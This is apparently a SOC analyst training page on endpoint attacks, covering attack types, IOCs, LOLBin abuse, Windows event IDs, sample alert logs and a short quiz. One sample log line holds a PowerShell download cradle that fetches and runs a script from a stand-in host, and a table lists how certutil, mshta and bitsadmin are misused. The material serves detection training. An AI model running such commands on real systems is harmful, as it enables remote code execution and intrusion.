Endpoint Attacks

SOC Analyst Perspective on Host-Based Threats

1Attack Types
2Detection
3Log Analysis
4Quiz

Endpoint Attack Categories

As a SOC analyst, you'll encounter various attacks targeting endpoints (workstations, servers, mobile devices). Understanding attack patterns helps you identify and respond to threats quickly.

Malware Execution

CRITICAL

Ransomware, trojans, worms executing on host. Look for unusual processes, file encryption activity.

Credential Theft

CRITICAL

Mimikatz, LSASS dumps, keyloggers stealing authentication data from memory or input.

Privilege Escalation

HIGH

Exploits elevating user to admin/SYSTEM. Watch for UAC bypasses, kernel exploits.

Persistence

HIGH

Registry run keys, scheduled tasks, services ensuring malware survives reboot.

Lateral Movement

HIGH

PsExec, WMI, RDP spreading to other hosts. Monitor unusual authentication patterns.

Living Off the Land

MEDIUM

PowerShell, certutil, mshta - legitimate tools used maliciously. Hard to detect.

Explore Full Malware Reference →

Deep dive into 16+ malware types with infection simulator, symptom checker, and defense builder.

Indicators of Compromise (IOCs)

SOC analysts use IOCs to identify malicious activity. These are observable artifacts left behind by attackers.

Host-Based IOCs

  • File Hashes Known malware MD5/SHA256 signatures
  • File Names Suspicious executables (svchost.exe in wrong location)
  • Registry Persistence keys modified (Run, RunOnce, Services)
  • Processes Unusual parent-child relationships (Word spawning PowerShell)
  • Connections Outbound traffic to known C2 IPs/domains

Detection Strategies

Signature-Based

Match known malware hashes and patterns. Fast but misses zero-days and polymorphic threats.

Behavior-Based

Detect anomalous actions: mass file encryption, LSASS access, unusual network patterns.

Heuristic

Rules-based detection using known attack patterns (MITRE ATT&CK techniques).

ML/AI

Machine learning models detecting deviations from baseline behavior profiles.

Living Off the Land (LOLBins)

Attackers increasingly use legitimate system tools instead of custom malware. These "Living Off the Land Binaries" (LOLBins) are already on the system, signed by Microsoft, and bypass most signature-based detection:

ToolLegitimate PurposeMalicious UseDetection
powershell.exeSystem administrationDownload & execute payloads, encoded commands (-enc)Monitor for -enc, -nop, -w hidden, IEX, Invoke-Expression
certutil.exeCertificate managementDownload files (-urlcache), decode base64 (-decode)Alert on certutil with -urlcache or -decode flags
mshta.exeHTML Application hostExecute remote HTA files containing scriptsMonitor for mshta.exe spawning child processes
rundll32.exeRun DLL functionsExecute malicious DLLs, bypass application whitelistingAlert on rundll32 loading DLLs from temp/download dirs
wmic.exeWMI queriesRemote process creation, lateral movementMonitor for wmic process call create
bitsadmin.exeBackground file transfersDownload malware via BITS jobsMonitor for bitsadmin /transfer with external URLs
Why LOLBins are dangerous: Antivirus won't flag powershell.exe or certutil.exe — they're Microsoft-signed system binaries. Detection requires behavioral monitoring: what these tools DO matters more than what they ARE. This is why EDR replaced traditional AV in enterprise security.

EDR Alert Categories

Endpoint Detection and Response (EDR) tools generate alerts that SOC analysts triage:

  • Process Injection: Code injected into legitimate process memory
  • Credential Access: Attempts to dump credentials from LSASS or SAM
  • Defense Evasion: Disabling AV, clearing logs, timestomping
  • Command & Control: Beaconing to external servers
  • Data Exfiltration: Large data transfers to unusual destinations

Windows Event Log Analysis

SOC analysts correlate Windows Event IDs to detect endpoint attacks:

Critical Event IDs

  • 4624 Successful logon - check for unusual accounts/times
  • 4625 Failed logon - brute force detection
  • 4688 Process creation - command line auditing
  • 4697 Service installed - persistence mechanism
  • 4698 Scheduled task created - persistence
  • 4720 User account created - unauthorized access
  • 7045 New service installed on system

Suspicious Log Patterns

Identify these patterns in your SIEM when hunting for endpoint attacks:

Example 1: Credential Dumping

2024-01-15 14:32:18 [CRITICAL] lsass.exe
Process Access: mimikatz.exe accessed lsass.exe with PROCESS_VM_READ
Source: WORKSTATION-PC | User: DOMAIN\admin

Example 2: PowerShell Download Cradle

2024-01-15 14:33:45 [WARNING] Event 4688
Process: powershell.exe
Command: IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')
Parent: WINWORD.EXE

Example 3: Persistence via Registry

2024-01-15 14:35:22 [WARNING] Registry Modified
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "WindowsUpdate" = "C:\Users\Public\update.exe"
Process: reg.exe

SOC Analyst Response Actions

  • Isolate: Quarantine affected endpoint from network
  • Preserve: Capture memory dump and disk image
  • Investigate: Analyze IOCs, timeline, scope
  • Contain: Block C2 IPs/domains, reset credentials
  • Eradicate: Remove malware, persistence mechanisms
  • Document: Create incident report with findings

Endpoint Attacks Quiz

Test your understanding. You need 80% (4/5) to pass.

Q1. A SOC analyst sees PowerShell.exe spawned by WINWORD.EXE. What type of attack is this?
Brute force attack
SQL injection
Macro-based malware delivery
Denial of service
Q2. Which Windows Event ID indicates a new service was installed?
4624
7045
4625
1102
Q3. Mimikatz accessing lsass.exe is an example of what attack type?
Credential theft
Data exfiltration
Denial of service
Phishing
Q4. An attacker uses certutil.exe to download malware. This technique is called:
Privilege escalation
Lateral movement
Persistence
Living off the land
Q5. Which detection method is BEST for catching zero-day malware?
Signature-based detection
Behavior-based detection
Hash matching
Blocklist filtering

Quiz Complete!

0/5